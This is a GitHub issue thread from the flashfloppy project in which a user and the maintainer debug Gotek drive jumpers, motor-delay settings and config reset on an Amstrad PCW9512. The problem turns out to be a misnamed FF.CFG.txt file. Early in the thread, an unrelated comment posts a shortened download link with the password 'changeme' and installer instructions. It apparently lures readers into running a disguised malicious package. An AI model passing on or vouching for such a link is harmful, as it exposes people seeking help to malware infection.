keirf/flashfloppy #926: Debugging MOR support on SFRKC30.AT4.35 + Amstrad PCW9512

erikarn, 2024-08-27:
hi! I have a PCW9512 here with an earlier gotek HW revision (AT415) running FF 3.42. It's a bog standard one w/ buttons and a 3 digit LED display.

With M0 jumpered and nothing else, as a single drive, it works fine and it boots a 720k DSK image with a CP/M plus + BIOS 2.15 install. It's not a double stepped disk image (ie, it's a real 720k image. :-) )

I just bought a later rev board with the same FF 3.42 image on it, and I wanted to test out the motor delay / MOR jumper settings. It comes with an OLED and rotary encoder knob.

However, there's two fun issues.

* If I put the motor delay option in FF.CFG and jumper MOR, MOR + S1, MOR + S0 - the PCW boot code doesn't detect the drive/disk at all and doesn't try loading.

* If I put the jumper on M0 (ie across MOR+S1, as indicated on the silk screen), it loads the boot track and then beeps at me, which I believe is it telling me the boot blocks aren't valid.

So, any hints on where to start poking at it? I'm familiar with STM32 debugging but I haven't hooked up a st-link to one of these boards yet. -)

Thanks!

-adrian

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

keirf, 2024-08-27:
Can you get the PCW to recognise the old AT415 drive with jumper at S0 or S1 only? It shouldn't be necessary to jumper MO here -- there ought to be a drive-select signal provided somehow on the PCW adapter that you're using. 

Then I would look at using MO as Motor as a separate thing.

erikarn, 2024-08-27:
ah interesting!

I'm using the one sordan.ie sells; I had S1 jumpers for wiring the side signal correctly and A: -> D0. I didn't have a jumper for B: -> D1.

I just jumpered both A: -> D0 and B: -> D1, and then yes, S1 by itself worked fine BUT then the lack of motor signaling meant it hung during drive probe.

Lemme go try that now on the other one!

keirf, 2024-08-27:
Yes sounds like MOR + S1 + motor-delay now basically works?

erikarn, 2024-08-27:
Motor delay isn't kicking in yet, because it's not booting the disk image enough to go through the XBIOS init path, and that's the path that requires the motor delay check.

jumpering both A: and B: mapping on the pinout adapter allows S1 -> A: detect to work, so it at least sees the drive now!

keirf, 2024-08-28:
Any more to discuss in this ticket?

erikarn, 2024-08-28:
Yeah, the same 720k image detects and fine on an AT415 gotek but /not/ on
the AT435 gotek!

-adrian

Message ID: ***@***.***>
>

keirf, 2024-08-28:
So where are we... Same jumpers on both? Same config (FF.CFG) on both? Did you reset any cached configuration on the 435 Gotek?

erikarn, 2024-08-28:
> So where are we... Same jumpers on both? Same config (FF.CFG) on both? Did
> you reset any cached configuration on the 435 Gotek?

Same jumpers, same FF.CFG (same drive.) I can try resetting the cached
config again - is the single motor timeout line enough?
Should I add anything else to it before i reset the cached config?

-adrian

keirf, 2024-08-28:
For now make the FF.CFG identical to the AT415 working drive. 

You can reset the cached config by holding both buttons for a few seconds, with no USB drive inserted, until the display says `RST` or `Reset Flash Config`

erikarn, 2024-08-28:
I never used a FF.CFG on the AT415 until I tried with the motor time
config. :-) So whatever the defaults were back in older 3.x images were it.
(Yes they're both now running the latest 3.x image.)

I'll check soon. Thanks!

-adrian

> Message ID: ***@***.***>
>

keirf, 2024-08-28:
I think the problem, with the `motor-delay` line will be that:
* AT415: The unconnected motor line is pulled low (active) by the MCU, so it looks like motor is always on.
* AT435: The motor line is pulled high (inactive) by an external resistor, so it looks like the motor is always off.

Hence the difference in behaviour.

If you can get the AT435 working without the `motor-delay` line, then I would next try reinstating that line, *and* add a jumper at position MOR. Hopefully that would then work!

erikarn, 2024-08-28:
hi!

ok, so i must have not reset the config right last time, but ok. Now it's reset, and it's loading the boot blocks but it's now hanging like motor-delay isn't working. The display also inverted, so my guess is the seller had loaded a default FF.CFG on this to "fix" things.

I've tried adding an OLED / font config to my FF.CFG, but it doesn't seem like it's being loaded. Ie:

* power on, no USB
* hold down both buttons, it says RESET on the display
* then it looks like it reboots internally?

Then I've tried these two:

a) plug in USB drive, it doesn't seem to load FF.CFG, hangs like MOR isn't jumpered / motor-delay isn't configured
b) power cycle everything first, THEN plug in USB drive, still doesn't seem to load FF.CFG

Should the OLED show something if FF.CFG is being loaded in?

erikarn, 2024-08-28:
ok this was PEBKAC - I was using windows, and it saved it as FF.CFG.txt . Whoops.

Ok, this all works fine now! Sorry for taking up your time!

closed 2024-08-28 by erikarn